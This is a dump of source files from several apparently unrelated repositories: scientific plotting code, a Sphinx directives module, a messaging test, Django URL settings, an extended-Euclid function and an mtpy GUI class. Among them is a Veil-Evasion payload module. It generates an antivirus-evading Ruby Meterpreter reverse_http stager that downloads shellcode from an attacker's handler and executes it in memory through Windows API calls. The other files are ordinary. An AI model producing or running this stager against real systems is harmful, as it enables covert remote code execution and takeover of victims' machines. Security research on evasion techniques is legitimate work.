# ? include "plot_header.template"
# ? from "plot_macros.template" import xdg_open with context
import numpy as np
import pandas as pd
import seaborn as sns
from matplotlib import pyplot as plt
sns.set_style('ticks')
colors = sns.color_palette()
## Load
timescales = pd.read_pickle('timescales.pandas.pickl')
n_timescales = len([x for x in timescales.columns
if x.startswith('timescale_')])
## Implied timescales vs lagtime
def plot_timescales(ax):
for i in range(n_timescales):
ax.scatter(timescales['lag_time'],
timescales['timescale_{}'.format(i)],
s=50, c=colors[0],
label=None, # pandas be interfering
)
xmin, xmax = ax.get_xlim()
xx = np.linspace(xmin, xmax)
ax.plot(xx, xx, color=colors[2], label='$y=x$')
ax.legend(loc='best', fontsize=14)
ax.set_xlabel('Lag Time / todo:units', fontsize=18)
ax.set_ylabel('Implied Timescales / todo:units', fontsize=18)
ax.set_xscale('log')
ax.set_yscale('log')
## Percent trimmed vs lagtime
def plot_trimmed(ax):
ax.plot(timescales['lag_time'],
timescales['percent_retained'],
'o-',
label=None, # pandas be interfering
)
ax.axhline(100, color='k', ls='--', label='100%')
ax.legend(loc='best', fontsize=14)
ax.set_xlabel('Lag Time / todo:units', fontsize=18)
ax.set_ylabel('Retained / %', fontsize=18)
ax.set_xscale('log')
ax.set_ylim((0, 110))
## Plot timescales
fig, ax = plt.subplots(figsize=(7, 5))
plot_timescales(ax)
fig.tight_layout()
fig.savefig('implied-timescales.pdf')
# {{xdg_open('implied-timescales.pdf')}}
## Plot trimmed
fig, ax = plt.subplots(figsize=(7,5))
plot_trimmed(ax)
fig.tight_layout()
fig.savefig('percent-trimmed.pdf')
# {{xdg_open('percent-trimmed.pdf')}}
| msultan/msmbuilder | msmbuilder/project_templates/msm/timescales-plot.py | Python | lgpl-2.1 | 1,908 | 0.004193 |
# -*- coding: utf-8 -*-
"""
sphinx.directives
~~~~~~~~~~~~~~~~~
Handlers for additional ReST directives.
:copyright: 2007-2008 by Georg Brandl.
:license: BSD.
"""
import re
import sys
import string
import posixpath
from os import path
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx import addnodes
from sphinx.roles import caption_ref_re
from sphinx.util.compat import make_admonition
ws_re = re.compile(r'\s+')
# ------ index markup --------------------------------------------------------------
entrytypes = [
'single', 'pair', 'triple', 'module', 'keyword', 'operator',
'object', 'exception', 'statement', 'builtin',
]
def index_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
arguments = arguments[0].split('\n')
env = state.document.settings.env
targetid = 'index-%s' % env.index_num
env.index_num += 1
targetnode = nodes.target('', '', ids=[targetid])
state.document.note_explicit_target(targetnode)
indexnode = addnodes.index()
indexnode['entries'] = ne = []
for entry in arguments:
entry = entry.strip()
for type in entrytypes:
if entry.startswith(type+':'):
value = entry[len(type)+1:].strip()
env.note_index_entry(type, value, targetid, value)
ne.append((type, value, targetid, value))
break
# shorthand notation for single entries
else:
for value in entry.split(','):
env.note_index_entry('single', value.strip(), targetid, value.strip())
ne.append(('single', value.strip(), targetid, value.strip()))
return [indexnode, targetnode]
index_directive.arguments = (1, 0, 1)
directives.register_directive('index', index_directive)
# ------ information units ---------------------------------------------------------
def desc_index_text(desctype, currmodule, name):
if desctype == 'function':
if not currmodule:
return '%s() (built-in function)' % name
return '%s() (in module %s)' % (name, currmodule)
elif desctype == 'data':
if not currmodule:
return '%s (built-in variable)' % name
return '%s (in module %s)' % (name, currmodule)
elif desctype == 'class':
return '%s (class in %s)' % (name, currmodule)
elif desctype == 'exception':
return name
elif desctype == 'method':
try:
clsname, methname = name.rsplit('.', 1)
except:
if currmodule:
return '%s() (in module %s)' % (name, currmodule)
else:
return '%s()' % name
if currmodule:
return '%s() (%s.%s method)' % (methname, currmodule, clsname)
else:
return '%s() (%s method)' % (methname, clsname)
elif desctype == 'attribute':
try:
clsname, attrname = name.rsplit('.', 1)
except:
if currmodule:
return '%s (in module %s)' % (name, currmodule)
else:
return name
if currmodule:
return '%s (%s.%s attribute)' % (attrname, currmodule, clsname)
else:
return '%s (%s attribute)' % (attrname, clsname)
elif desctype == 'opcode':
return '%s (opcode)' % name
elif desctype == 'cfunction':
return '%s (C function)' % name
elif desctype == 'cmember':
return '%s (C member)' % name
elif desctype == 'cmacro':
return '%s (C macro)' % name
elif desctype == 'ctype':
return '%s (C type)' % name
elif desctype == 'cvar':
return '%s (C variable)' % name
else:
raise ValueError("unhandled descenv: %s" % desctype)
# ------ functions to parse a Python or C signature and create desc_* nodes.
py_sig_re = re.compile(r'''^([\w.]*\.)? # class names
(\w+) \s* # thing name
(?: \((.*)\) )? $ # optionally arguments
''', re.VERBOSE)
py_paramlist_re = re.compile(r'([\[\],])') # split at '[', ']' and ','
def parse_py_signature(signode, sig, desctype, env):
"""
Transform a python signature into RST nodes.
Return (fully qualified name of the thing, classname if any).
If inside a class, the current class name is handled intelligently:
* it is stripped from the displayed name if present
* it is added to the full name (return value) if not present
"""
m = py_sig_re.match(sig)
if m is None: raise ValueError
classname, name, arglist = m.groups()
add_module = True
if env.currclass:
if classname and classname.startswith(env.currclass):
fullname = classname + name
# class name is given again in the signature
classname = classname[len(env.currclass):].lstrip('.')
add_module = False
elif classname:
# class name is given in the signature, but different
fullname = env.currclass + '.' + classname + name
else:
# class name is not given in the signature
fullname = env.currclass + '.' + name
add_module = False
else:
fullname = classname and classname + name or name
if classname:
signode += addnodes.desc_classname(classname, classname)
# exceptions are a special case, since they are documented in the
# 'exceptions' module.
elif add_module and env.config.add_module_names and \
env.currmodule and env.currmodule != 'exceptions':
nodetext = env.currmodule + '.'
signode += addnodes.desc_classname(nodetext, nodetext)
signode += addnodes.desc_name(name, name)
if not arglist:
if desctype in ('function', 'method'):
# for callables, add an empty parameter list
signode += addnodes.desc_parameterlist()
return fullname, classname
signode += addnodes.desc_parameterlist()
stack = [signode[-1]]
for token in py_paramlist_re.split(arglist):
if token == '[':
opt = addnodes.desc_optional()
stack[-1] += opt
stack.append(opt)
elif token == ']':
try: stack.pop()
except IndexError: raise ValueError
elif not token or token == ',' or token.isspace():
pass
else:
token = token.strip()
stack[-1] += addnodes.desc_parameter(token, token)
if len(stack) != 1: raise ValueError
return fullname, classname
c_sig_re = re.compile(
r'''^([^(]*?) # return type
([\w:]+) \s* # thing name (colon allowed for C++ class names)
(?: \((.*)\) )? $ # optionally arguments
''', re.VERBOSE)
c_funcptr_sig_re = re.compile(
r'''^([^(]+?) # return type
(\( [^()]+ \)) \s* # name in parentheses
\( (.*) \) $ # arguments
''', re.VERBOSE)
c_funcptr_name_re = re.compile(r'^\(\s*\*\s*(.*?)\s*\)$')
# RE to split at word boundaries
wsplit_re = re.compile(r'(\W+)')
# These C types aren't described in the reference, so don't try to create
# a cross-reference to them
stopwords = set(('const', 'void', 'char', 'int', 'long', 'FILE', 'struct'))
def parse_c_type(node, ctype):
# add cross-ref nodes for all words
for part in filter(None, wsplit_re.split(ctype)):
tnode = nodes.Text(part, part)
if part[0] in string.letters+'_' and part not in stopwords:
pnode = addnodes.pending_xref(
'', reftype='ctype', reftarget=part, modname=None, classname=None)
pnode += tnode
node += pnode
else:
node += tnode
def parse_c_signature(signode, sig, desctype):
"""Transform a C (or C++) signature into RST nodes."""
# first try the function pointer signature regex, it's more specific
m = c_funcptr_sig_re.match(sig)
if m is None:
m = c_sig_re.match(sig)
if m is None:
raise ValueError('no match')
rettype, name, arglist = m.groups()
signode += addnodes.desc_type("", "")
parse_c_type(signode[-1], rettype)
signode += addnodes.desc_name(name, name)
# clean up parentheses from canonical name
m = c_funcptr_name_re.match(name)
if m:
name = m.group(1)
if not arglist:
if desctype == 'cfunction':
# for functions, add an empty parameter list
signode += addnodes.desc_parameterlist()
return name
paramlist = addnodes.desc_parameterlist()
arglist = arglist.replace('`', '').replace('\\ ', '') # remove markup
# this messes up function pointer types, but not too badly ;)
args = arglist.split(',')
for arg in args:
arg = arg.strip()
param = addnodes.desc_parameter('', '', noemph=True)
try:
ctype, argname = arg.rsplit(' ', 1)
except ValueError:
# no argument name given, only the type
parse_c_type(param, arg)
else:
parse_c_type(param, ctype)
param += nodes.emphasis(' '+argname, ' '+argname)
paramlist += param
signode += paramlist
return name
opcode_sig_re = re.compile(r'(\w+(?:\+\d)?)\s*\((.*)\)')
def parse_opcode_signature(signode, sig):
"""Transform an opcode signature into RST nodes."""
m = opcode_sig_re.match(sig)
if m is None: raise ValueError
opname, arglist = m.groups()
signode += addnodes.desc_name(opname, opname)
paramlist = addnodes.desc_parameterlist()
signode += paramlist
paramlist += addnodes.desc_parameter(arglist, arglist)
return opname.strip()
option_desc_re = re.compile(
r'(/|-|--)([-_a-zA-Z0-9]+)(\s*.*?)(?=,\s+(?:/|-|--)|$)')
def parse_option_desc(signode, sig):
"""Transform an option description into RST nodes."""
count = 0
firstname = ''
for m in option_desc_re.finditer(sig):
prefix, optname, args = m.groups()
if count:
signode += addnodes.desc_classname(', ', ', ')
signode += addnodes.desc_name(prefix+optname, prefix+optname)
signode += addnodes.desc_classname(args, args)
if not count:
firstname = optname
count += 1
if not firstname:
raise ValueError
return firstname
def desc_directive(desctype, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
node = addnodes.desc()
node['desctype'] = desctype
noindex = ('noindex' in options)
node['noindex'] = noindex
# remove backslashes to support (dummy) escapes; helps Vim's highlighting
signatures = map(lambda s: s.strip().replace('\\', ''), arguments[0].split('\n'))
names = []
clsname = None
for i, sig in enumerate(signatures):
# add a signature node for each signature in the current unit
# and add a reference target for it
sig = sig.strip()
signode = addnodes.desc_signature(sig, '')
signode['first'] = False
node.append(signode)
try:
if desctype in ('function', 'data', 'class', 'exception',
'method', 'attribute'):
name, clsname = parse_py_signature(signode, sig, desctype, env)
elif desctype in ('cfunction', 'cmember', 'cmacro', 'ctype', 'cvar'):
name = parse_c_signature(signode, sig, desctype)
elif desctype == 'opcode':
name = parse_opcode_signature(signode, sig)
elif desctype == 'cmdoption':
optname = parse_option_desc(signode, sig)
if not noindex:
targetname = 'cmdoption-' + optname
signode['ids'].append(targetname)
state.document.note_explicit_target(signode)
env.note_index_entry('pair', 'command line option; %s' % sig,
targetname, targetname)
env.note_reftarget('option', optname, targetname)
continue
elif desctype == 'describe':
signode.clear()
signode += addnodes.desc_name(sig, sig)
continue
else:
# another registered generic x-ref directive
rolename, indextemplate, parse_node = additional_xref_types[desctype]
if parse_node:
fullname = parse_node(env, sig, signode)
else:
signode.clear()
signode += addnodes.desc_name(sig, sig)
# normalize whitespace like xfileref_role does
fullname = ws_re.sub('', sig)
if not noindex:
targetname = '%s-%s' % (rolename, fullname)
signode['ids'].append(targetname)
state.document.note_explicit_target(signode)
if indextemplate:
indexentry = indextemplate % (fullname,)
indextype = 'single'
colon = indexentry.find(':')
if colon != -1:
indextype = indexentry[:colon].strip()
indexentry = indexentry[colon+1:].strip()
env.note_index_entry(indextype, indexentry,
targetname, targetname)
env.note_reftarget(rolename, fullname, targetname)
# don't use object indexing below
continue
except ValueError, err:
# signature parsing failed
signode.clear()
signode += addnodes.desc_name(sig, sig)
continue # we don't want an index entry here
# only add target and index entry if this is the first description of the
# function name in this desc block
if not noindex and name not in names:
fullname = (env.currmodule and env.currmodule + '.' or '') + name
# note target
if fullname not in state.document.ids:
signode['names'].append(fullname)
signode['ids'].append(fullname)
signode['first'] = (not names)
state.document.note_explicit_target(signode)
env.note_descref(fullname, desctype, lineno)
names.append(name)
env.note_index_entry('single',
desc_index_text(desctype, env.currmodule, name),
fullname, fullname)
subnode = addnodes.desc_content()
# needed for automatic qualification of members
clsname_set = False
if desctype in ('class', 'exception') and names:
env.currclass = names[0]
clsname_set = True
elif desctype in ('method', 'attribute') and clsname and not env.currclass:
env.currclass = clsname.strip('.')
clsname_set = True
# needed for association of version{added,changed} directives
if names:
env.currdesc = names[0]
state.nested_parse(content, content_offset, subnode)
if clsname_set:
env.currclass = None
env.currdesc = None
node.append(subnode)
return [node]
desc_directive.content = 1
desc_directive.arguments = (1, 0, 1)
desc_directive.options = {'noindex': directives.flag}
desctypes = [
# the Python ones
'function',
'data',
'class',
'method',
'attribute',
'exception',
# the C ones
'cfunction',
'cmember',
'cmacro',
'ctype',
'cvar',
# the odd one
'opcode',
# for command line options
'cmdoption',
# the generic one
'describe',
'envvar',
]
for _name in desctypes:
directives.register_directive(_name, desc_directive)
# Generic cross-reference types; they can be registered in the application;
# the directives are either desc_directive or target_directive
additional_xref_types = {
# directive name: (role name, index text, function to parse the desc node)
'envvar': ('envvar', 'environment variable; %s', None),
}
# ------ target --------------------------------------------------------------------
def target_directive(targettype, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
"""Generic target for user-defined cross-reference types."""
env = state.document.settings.env
rolename, indextemplate, _ = additional_xref_types[targettype]
# normalize whitespace in fullname like xfileref_role does
fullname = ws_re.sub('', arguments[0].strip())
targetname = '%s-%s' % (rolename, fullname)
node = nodes.target('', '', ids=[targetname])
state.document.note_explicit_target(node)
if indextemplate:
indexentry = indextemplate % (fullname,)
indextype = 'single'
colon = indexentry.find(':')
if colon != -1:
indextype = indexentry[:colon].strip()
indexentry = indexentry[colon+1:].strip()
env.note_index_entry(indextype, indexentry, targetname, targetname)
env.note_reftarget(rolename, fullname, targetname)
return [node]
target_directive.content = 0
target_directive.arguments = (1, 0, 1)
# ------ versionadded/versionchanged -----------------------------------------------
def version_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
node = addnodes.versionmodified()
node['type'] = name
node['version'] = arguments[0]
if len(arguments) == 2:
inodes, messages = state.inline_text(arguments[1], lineno+1)
node.extend(inodes)
if content:
state.nested_parse(content, content_offset, node)
ret = [node] + messages
else:
ret = [node]
env = state.document.settings.env
env.note_versionchange(node['type'], node['version'], node, lineno)
return ret
version_directive.arguments = (1, 1, 1)
version_directive.content = 1
directives.register_directive('deprecated', version_directive)
directives.register_directive('versionadded', version_directive)
directives.register_directive('versionchanged', version_directive)
# ------ see also ------------------------------------------------------------------
def seealso_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
rv = make_admonition(
addnodes.seealso, name, ['See also'], options, content,
lineno, content_offset, block_text, state, state_machine)
return rv
seealso_directive.content = 1
seealso_directive.arguments = (0, 0, 0)
directives.register_directive('seealso', seealso_directive)
# ------ production list (for the reference) ---------------------------------------
token_re = re.compile('`([a-z_]+)`')
def token_xrefs(text, env):
retnodes = []
pos = 0
for m in token_re.finditer(text):
if m.start() > pos:
txt = text[pos:m.start()]
retnodes.append(nodes.Text(txt, txt))
refnode = addnodes.pending_xref(m.group(1))
refnode['reftype'] = 'token'
refnode['reftarget'] = m.group(1)
refnode['modname'] = env.currmodule
refnode['classname'] = env.currclass
refnode += nodes.literal(m.group(1), m.group(1), classes=['xref'])
retnodes.append(refnode)
pos = m.end()
if pos < len(text):
retnodes.append(nodes.Text(text[pos:], text[pos:]))
return retnodes
def productionlist_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
node = addnodes.productionlist()
messages = []
i = 0
for rule in arguments[0].split('\n'):
if i == 0 and ':' not in rule:
# production group
continue
i += 1
try:
name, tokens = rule.split(':', 1)
except ValueError:
break
subnode = addnodes.production()
subnode['tokenname'] = name.strip()
if subnode['tokenname']:
idname = 'grammar-token-%s' % subnode['tokenname']
if idname not in state.document.ids:
subnode['ids'].append(idname)
state.document.note_implicit_target(subnode, subnode)
env.note_reftarget('token', subnode['tokenname'], idname)
subnode.extend(token_xrefs(tokens, env))
node.append(subnode)
return [node] + messages
productionlist_directive.content = 0
productionlist_directive.arguments = (1, 0, 1)
directives.register_directive('productionlist', productionlist_directive)
# ------ section metadata ----------------------------------------------------------
def module_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
modname = arguments[0].strip()
env.currmodule = modname
env.note_module(modname, options.get('synopsis', ''),
options.get('platform', ''),
'deprecated' in options)
modulenode = addnodes.module()
modulenode['modname'] = modname
modulenode['synopsis'] = options.get('synopsis', '')
targetnode = nodes.target('', '', ids=['module-' + modname])
state.document.note_explicit_target(targetnode)
ret = [modulenode, targetnode]
if 'platform' in options:
modulenode['platform'] = options['platform']
node = nodes.paragraph()
node += nodes.emphasis('Platforms: ', 'Platforms: ')
node += nodes.Text(options['platform'], options['platform'])
ret.append(node)
# the synopsis isn't printed; in fact, it is only used in the modindex currently
env.note_index_entry('single', '%s (module)' % modname, 'module-' + modname,
modname)
return ret
module_directive.arguments = (1, 0, 0)
module_directive.options = {'platform': lambda x: x,
'synopsis': lambda x: x,
'deprecated': directives.flag}
directives.register_directive('module', module_directive)
def currentmodule_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
# This directive is just to tell people that we're documenting
# stuff in module foo, but links to module foo won't lead here.
env = state.document.settings.env
modname = arguments[0].strip()
env.currmodule = modname
return []
currentmodule_directive.arguments = (1, 0, 0)
directives.register_directive('currentmodule', currentmodule_directive)
def author_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
# Show authors only if the show_authors option is on
env = state.document.settings.env
if not env.config.show_authors:
return []
para = nodes.paragraph()
emph = nodes.emphasis()
para += emph
if name == 'sectionauthor':
text = 'Section author: '
elif name == 'moduleauthor':
text = 'Module author: '
else:
text = 'Author: '
emph += nodes.Text(text, text)
inodes, messages = state.inline_text(arguments[0], lineno)
emph.extend(inodes)
return [para] + messages
author_directive.arguments = (1, 0, 1)
directives.register_directive('sectionauthor', author_directive)
directives.register_directive('moduleauthor', author_directive)
# ------ toctree directive ---------------------------------------------------------
def toctree_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
env = state.document.settings.env
suffix = env.config.source_suffix
dirname = posixpath.dirname(env.docname)
ret = []
subnode = addnodes.toctree()
includefiles = []
includetitles = {}
for docname in content:
if not docname:
continue
# look for explicit titles and documents ("Some Title <document>").
m = caption_ref_re.match(docname)
if m:
docname = m.group(2)
includetitles[docname] = m.group(1)
# absolutize filenames, remove suffixes
if docname.endswith(suffix):
docname = docname[:-len(suffix)]
docname = posixpath.normpath(posixpath.join(dirname, docname))
if docname not in env.found_docs:
ret.append(state.document.reporter.warning(
'toctree references unknown document %r' % docname, line=lineno))
else:
includefiles.append(docname)
subnode['includefiles'] = includefiles
subnode['includetitles'] = includetitles
subnode['maxdepth'] = options.get('maxdepth', -1)
ret.append(subnode)
return ret
toctree_directive.content = 1
toctree_directive.options = {'maxdepth': int}
directives.register_directive('toctree', toctree_directive)
# ------ centered directive ---------------------------------------------------------
def centered_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
if not arguments:
return []
subnode = addnodes.centered()
inodes, messages = state.inline_text(arguments[0], lineno)
subnode.extend(inodes)
return [subnode] + messages
centered_directive.arguments = (1, 0, 1)
directives.register_directive('centered', centered_directive)
# ------ highlight directive --------------------------------------------------------
def highlightlang_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
if 'linenothreshold' in options:
try:
linenothreshold = int(options['linenothreshold'])
except Exception:
linenothreshold = 10
else:
linenothreshold = sys.maxint
return [addnodes.highlightlang(lang=arguments[0].strip(),
linenothreshold=linenothreshold)]
highlightlang_directive.content = 0
highlightlang_directive.arguments = (1, 0, 0)
highlightlang_directive.options = {'linenothreshold': directives.unchanged}
directives.register_directive('highlight', highlightlang_directive)
directives.register_directive('highlightlang', highlightlang_directive) # old name
# ------ code-block directive -------------------------------------------------------
def codeblock_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
code = u'\n'.join(content)
literal = nodes.literal_block(code, code)
literal['language'] = arguments[0]
literal['linenos'] = 'linenos' in options
return [literal]
codeblock_directive.content = 1
codeblock_directive.arguments = (1, 0, 0)
codeblock_directive.options = {'linenos': directives.flag}
directives.register_directive('code-block', codeblock_directive)
directives.register_directive('sourcecode', codeblock_directive)
# ------ literalinclude directive ---------------------------------------------------
def literalinclude_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
"""Like .. include:: :literal:, but only warns if the include file is not found."""
if not state.document.settings.file_insertion_enabled:
return [state.document.reporter.warning('File insertion disabled', line=lineno)]
env = state.document.settings.env
rel_fn = arguments[0]
source_dir = path.dirname(path.abspath(state_machine.input_lines.source(
lineno - state_machine.input_offset - 1)))
fn = path.normpath(path.join(source_dir, rel_fn))
try:
f = open(fn)
text = f.read()
f.close()
except (IOError, OSError):
retnode = state.document.reporter.warning(
'Include file %r not found or reading it failed' % arguments[0], line=lineno)
else:
retnode = nodes.literal_block(text, text, source=fn)
retnode.line = 1
if options.get('language', ''):
retnode['language'] = options['language']
if 'linenos' in options:
retnode['linenos'] = True
state.document.settings.env.note_dependency(rel_fn)
return [retnode]
literalinclude_directive.options = {'linenos': directives.flag,
'language': directives.unchanged}
literalinclude_directive.content = 0
literalinclude_directive.arguments = (1, 0, 0)
directives.register_directive('literalinclude', literalinclude_directive)
# ------ glossary directive ---------------------------------------------------------
def glossary_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
"""Glossary with cross-reference targets for :dfn: roles."""
env = state.document.settings.env
node = addnodes.glossary()
state.nested_parse(content, content_offset, node)
# the content should be definition lists
dls = [child for child in node if isinstance(child, nodes.definition_list)]
# now, extract definition terms to enable cross-reference creation
for dl in dls:
dl['classes'].append('glossary')
for li in dl.children:
if not li.children or not isinstance(li[0], nodes.term):
continue
termtext = li.children[0].astext()
new_id = 'term-' + nodes.make_id(termtext)
if new_id in env.gloss_entries:
new_id = 'term-' + str(len(env.gloss_entries))
env.gloss_entries.add(new_id)
li[0]['names'].append(new_id)
li[0]['ids'].append(new_id)
state.document.settings.env.note_reftarget('term', termtext.lower(),
new_id)
return [node]
glossary_directive.content = 1
glossary_directive.arguments = (0, 0, 0)
directives.register_directive('glossary', glossary_directive)
# ------ acks directive -------------------------------------------------------------
def acks_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
node = addnodes.acks()
state.nested_parse(content, content_offset, node)
if len(node.children) != 1 or not isinstance(node.children[0], nodes.bullet_list):
return [state.document.reporter.warning('.. acks content is not a list',
line=lineno)]
return [node]
acks_directive.content = 1
acks_directive.arguments = (0, 0, 0)
directives.register_directive('acks', acks_directive)
| creasyw/IMTAphy | documentation/doctools/tags/0.2/sphinx/directives.py | Python | gpl-2.0 | 31,058 | 0.002222 |
import json
import time
import jps
class MessageHolder(object):
def __init__(self):
self.saved_msg = []
def __call__(self, msg):
self.saved_msg.append(msg)
def test_pubsub_with_serialize_json():
holder = MessageHolder()
sub = jps.Subscriber('/serialize_hoge1', holder,
deserializer=json.loads)
pub = jps.Publisher('/serialize_hoge1',
serializer=json.dumps)
time.sleep(0.1)
obj = {'da1': 1, 'name': 'hoge'}
pub.publish(obj)
time.sleep(0.1)
sub.spin_once()
assert len(holder.saved_msg) == 1
assert holder.saved_msg[0]['da1'] == 1
assert holder.saved_msg[0]['name'] == 'hoge'
| OTL/jps | test/test_serialize.py | Python | apache-2.0 | 697 | 0 |
from os import environ
from django.conf.urls import include, url
from django.conf import settings
from django.conf.urls.static import static
from .wooey_urls import *
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| wooey/django-djangui | wooey/conf/project_template/urls/user_urls.py | Python | bsd-3-clause | 353 | 0.005666 |
"""
Custom-written pure ruby meterpreter/reverse_http stager.
TODO: better randomization
Module built by @harmj0y
"""
from modules.common import helpers
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
self.language = "ruby"
self.extension = "rb"
self.rating = "Normal"
# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = { "compile_to_exe" : ["Y", "Compile to an executable"],
"LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"]}
def generate(self):
payloadCode = "require 'rubygems';require 'win32/api';require 'net/http';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
payloadCode += "$v = API.new('VirtualAlloc', 'IIII', 'I');$r = API.new('RtlMoveMemory', 'IPI', 'V');$c = API.new('CreateThread', 'IIIIIP', 'I');$w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "def ch()\n"
#payloadCode += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n"
#payloadCode += "\t32.times do\n"
#payloadCode += "\t\turi = chk.sample().join()\n"
#payloadCode += "\t\tchk.sort_by {rand}.each do |x|\n"
#payloadCode += "\t\t\treturn(uri + x) if (uri + x).unpack(\"C*\").inject(:+) % 0x100 == 92\n"
#payloadCode += "\t\tend\n"
#payloadCode += "\tend\n"
payloadCode += "\treturn \"WEZf\"\n"
payloadCode += "end\n"
payloadCode += "def ij(sc)\n"
payloadCode += "\tif sc.length > 1000\n"
payloadCode += "\t\tpt = $v.call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payloadCode += "\t\tx = $r.call(pt,sc,sc.length)\n"
payloadCode += "\t\tx = $w.call($c.call(0,0,pt,0,0,0),0xFFFFFFF)\n"
payloadCode += "\tend\nend\n"
payloadCode += "uri = URI.encode(\"http://%s:%s/#{ch()}\")\n" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payloadCode += "uri = URI(uri)\n"
payloadCode += "ij(Net::HTTP.get(uri))"
return payloadCode | jorik041/Veil-Evasion | modules/payloads/ruby/meterpreter/rev_http.py | Python | gpl-3.0 | 2,371 | 0.012231 |
# -*- coding: utf-8 -*-
import os
# Author: Sam Erickson
# Date: 2/23/2016
#
# Program Description: This program gives the integer coefficients x,y to the
# equation ax+by=gcd(a,b) given by the extended Euclidean Algorithm.
def extendedEuclid(a, b):
"""
Preconditions - a and b are both positive integers.
Posconditions - The equation for ax+by=gcd(a,b) has been returned where
x and y are solved.
Input - a : int, b : int
Output - ax+by=gcd(a,b) : string
"""
b, a = max(a, b), min(a, b)
# Format of euclidList is for back-substitution
euclidList = [[b % a, 1, b, -1 * (b // a), a]]
while b % a > 0:
b, a = a, b % a
euclidList.append([b % a, 1, b, -1 * (b // a), a])
if len(euclidList) > 1:
euclidList.pop()
euclidList = euclidList[::-1]
for i in range(1, len(euclidList)):
euclidList[i][1] *= euclidList[i - 1][3]
euclidList[i][3] *= euclidList[i - 1][3]
euclidList[i][3] += euclidList[i - 1][1]
expr = euclidList[len(euclidList) - 1]
strExpr = str(expr[1]) + "*" + str(expr[2]) + " + " + str(expr[3]) + "*" + str(expr[4]) \
+ " = " + str(euclidList[0][0])
return strExpr
os.system("pause")
| NicovincX2/Python-3.5 | Algorithmique/Algorithme/Algorithme numérique/Algorithme d'Euclide étendu/extended_euclidean_algorithm.py | Python | gpl-3.0 | 1,258 | 0.00159 |
# -*- coding: utf-8 -*-
"""
Description:
Usage:
Author: YingzhiGou
Date: 21/08/2017
"""
from mtpy.gui.SmartMT.Components.FigureSetting import Font
from mtpy.gui.SmartMT.Components.PlotParameter import FrequencyTolerance, Rotation
from mtpy.gui.SmartMT.gui.plot_control_guis import PlotControlStrike
from mtpy.gui.SmartMT.visualization import VisualizationBase
from mtpy.imaging.plotstrike import PlotStrike
from mtpy.utils.matplotlib_utils import get_next_fig_num
class Strike(VisualizationBase):
def __init__(self, parent):
VisualizationBase.__init__(self, parent)
# setup ui
self._plot_control_ui = PlotControlStrike(self._parameter_ui)
self._parameter_ui.add_parameter_groupbox(self._plot_control_ui)
self._rotation_ui = Rotation(self._parameter_ui)
self._parameter_ui.add_parameter_groupbox(self._rotation_ui)
self._tolerance_ui = FrequencyTolerance(self._parameter_ui)
self._tolerance_ui.ui.doubleSpinBox.setValue(0.05) # set default value
self._parameter_ui.add_parameter_groupbox(self._tolerance_ui)
self._font_ui = Font(self._parameter_ui)
self._font_ui.hide_weight()
self._font_ui.hide_color()
self._parameter_ui.add_figure_groupbox(self._font_ui)
self._parameter_ui.end_of_parameter_components()
self.update_ui()
self._params = None
def plot(self):
# set up params
self._params = {
'fn_list': [mt_obj.fn for mt_obj in self._mt_objs],
'rot_z': self._rotation_ui.get_rotation_in_degree(),
'period_tolerance': self._tolerance_ui.get_tolerance_in_float(),
'plot_range': self._plot_control_ui.get_plot_range(),
'plot_type': self._plot_control_ui.get_plot_type(),
'plot_tipper': self._plot_control_ui.get_plot_tipper(),
'pt_error_floor': self._plot_control_ui.get_error_floor(),
'fold': self._plot_control_ui.get_fold(),
'fig_size': (8, 6),
'fig_dpi': 100,
"plot_yn": 'n',
"fig_num": get_next_fig_num()
}
param = self._font_ui.get_size()
if param is not None:
self._params['font_size'] = param
self._plotting_object = PlotStrike(**self._params)
self._plotting_object.plot(show=False)
self._fig = self._plotting_object.fig
def update_ui(self):
pass
@staticmethod
def plot_name():
return "Strike"
@staticmethod
def plot_description():
return """
<p>This plots the estrike estimated from the invariants,
phase tensor and the tipper in either a rose diagram of
xy plot</p>
<p>plots the strike angle as determined by phase tensor
azimuth (Caldwell et al. [2004]) and invariants of the
impedance tensor (Weaver et al. [2003]).</p>
<p>The data is split into decades where the histogram
for each is plotted in the form of a rose diagram with a
range of 0 to 180 degrees. Where 0 is North and 90 is
East. The median angle of the period band is set in
polar diagram. The top row is the strike estimated from
the invariants of the impedance tensor. The bottom row
is the azimuth estimated from the phase tensor. If
tipper is plotted then the 3rd row is the strike determined
from the tipper, which is orthogonal to the induction
arrow direction.</p>
"""
def get_plot_tooltip(self):
pass
| MTgeophysics/mtpy | mtpy/gui/SmartMT/visualization/strike.py | Python | gpl-3.0 | 3,575 | 0.003077 |
"""
BleachBit
Copyright (C) 2008-2020 Andrew Ziem
https://www.bleachbit.org
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
